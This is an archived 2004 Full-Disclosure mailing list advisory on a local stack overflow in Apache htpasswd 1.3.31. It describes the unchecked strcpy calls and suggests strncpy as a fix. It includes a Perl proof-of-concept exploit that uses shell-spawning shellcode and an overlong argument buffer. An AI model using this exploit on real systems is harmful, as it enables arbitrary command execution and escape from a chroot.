| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <d7ff97620409160923913b127@mail.gmail.com>
Date: Thu, 16 Sep 2004 13:23:03 -0300
From: Luiz Fernando <luiz.fc@...il.com>
To: bugtraq@...urityfocus.com, vulnwatch@...nwatch.org,
full-disclosure@...ts.netsys.com
Subject: FlowSecurity.org: Local Stack Overflow on htpasswd apache 1.3.31 advsory.
**********************************************************************************************
Flow Security
foxtrot@...wsecurity.org
September 16nd,
2004 Luiz
Fernando Camargo
-----------------------------------------------------------------------------------------------------------------------------
Package Name: Apache htpasswd
Vendor URL: http://www.apache.org
Vendor Notified: Two months ago, but we got no answer.
Date: 2004-09-16
ID: FST-#0001
Affected Version: 1.3.31 and prior versions.
Risk: Execute arbitrary command, maybe evade apache chroot()
**********************************************************************************************
[01] Package Description
[02] The problem
[03] Possibilities
[04] Solution
[05] Proof of Concept
[06] Credits
[01] Short Description
Since htpasswd is part of apache software, here we got the apache description.
Apache has been the most popular web server on the Internet since
April of 1996. The October 2003 Netcraft Web Server Survey found that
more than 64% of the web sites on the Internet are using Apache, thus
making it more widely used than all other web servers combined.
[02] The problem
In apache/src/support/htpasswd.c were found lots of problems with strcpy.
Unchecked buffers with user and passwd variables may let an attacker
to take advantage of it.
[03] Possibilities
htpasswd is not setuid root by default. And it doesn't have any sense to
do it yourself. So you can't gain root by exploiting these bugs directly.
However, you can get out from apache's chroot environment since
htpasswd usually stays in its environment.
[04] Solution
Take a good look in strcpy functions and maybe change it for strncpy function.
[05] Proof of Concept
-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------
#!/usr/bin/perl
# Proof Of Concept exploit for htpasswd of Apache.
# Read the advisory for more information.
# - Luiz Fernando Camargo
# - foxtrot@...wsecurity.org
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);
print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";
local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;
exec("$target -nb $buffer");
-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------
[06] Credits
Jefferson Cachinel
Thyago Silva
Rodrigo Rubira Branco
Adriano Lima
Jardir ph0enix
cheers,
Luiz Fernando Camargo
www.flowsecurity.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists